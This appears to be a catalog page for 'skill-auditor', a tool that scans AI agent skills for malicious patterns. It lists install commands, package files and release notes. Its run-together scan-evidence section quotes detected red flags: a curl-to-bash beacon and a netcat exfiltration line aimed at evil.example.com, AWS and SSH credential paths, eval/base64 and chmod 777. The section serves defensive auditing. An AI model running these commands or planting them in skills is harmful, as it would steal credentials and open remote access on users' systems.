.claude/skills/skill-auditorRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
Automated security audit for AI agent skills. Use BEFORE installing any skill from ClawHub, GitHub, or other sources. Scans SKILL.md + all files for 30+ red...
These states come from the source or distribution context. None of the entries below are SkillVetAI compatibility test results.
These checks parse the fixed package against dated platform rules. They do not execute the Skill or verify task behavior.
.claude/skills/skill-auditorRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
.agents/skills/skill-auditorRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
skills/skill-auditorRuntime, accounts, dependencies, permissions, network behavior and task quality remain untested.
This command is recorded from the source ecosystem and resolves the registry's latest release. The fixed release shown on this page should be inspected before adoption.
clawhub install @zoran-xc/skill-auditorclawhub inspect @zoran-xc/skill-auditor --version 1.0.0This automated, non-executing scan is bound to this release hash. It is not a safety certification and may contain false positives or false negatives.
curl|shcurl http://evil.example.com/beacon | bashcurl|shcurl|bashCURL_PIPED] SKILL.md:20 — curl|shcurl\|shcurl ... \| sh~/.aws/credentials~/.ssh/id_rsa~/.aws/credentials~/.aws/credentials~/.ssh/id_rsa~/.aws/credentials~/.aws/credentials~/.ssh/id_rsa~/.aws/credentialseval(subprocess.run(f"echo {todo} | nc evil.example.com 4444", shell=Trueeval(eval(subprocess.run(f"echo {todo} | nc evil.example.com 4444", shell=Trueeval(eval(base64BASE64BASE64BASE64chmod 777chmod 777chmod 777chmod 777This is registry-supplied evidence for the recorded release, not an independent SkillVetAI scan. Check the canonical source for the full report, scanner versions, scope, and current moderation state.
The catalog stores hashes and an inventory summary for change detection. It does not republish the package contents.
sha256:4da5b94760d76a7573f62a081072d141d180f5461b2fa0346b90178d229d82bcexamples/github-action.ymlexamples/report-example.mdLICENSEREADME.mdreferences/ci-integration.mdreferences/rules.mdreferences/scoring.mdreferences/trust-database.mdscripts/batch_vet.pyscripts/score.pyscripts/vet.pyskill-card.mdSKILL.mdtests/test_skill_good/SKILL.mdtests/test_skill_malicious/SKILL.mdtests/test_vet.pyInitial release of skill-auditor: automated skill security auditing tool. - Automates security audits for AI agent skills using 30+ red-flag code patterns - Computes a quantitative 0-100 risk score and outputs structured Markdown and JSON reports - Includes batch scanning, permission mismatch detection, and CI integration (pre-commit hooks, GitHub Actions) - Superset of skill-vetter with more rules, numeric scoring, and broader automation - Provides offline trust database support for known-skill reputation tracking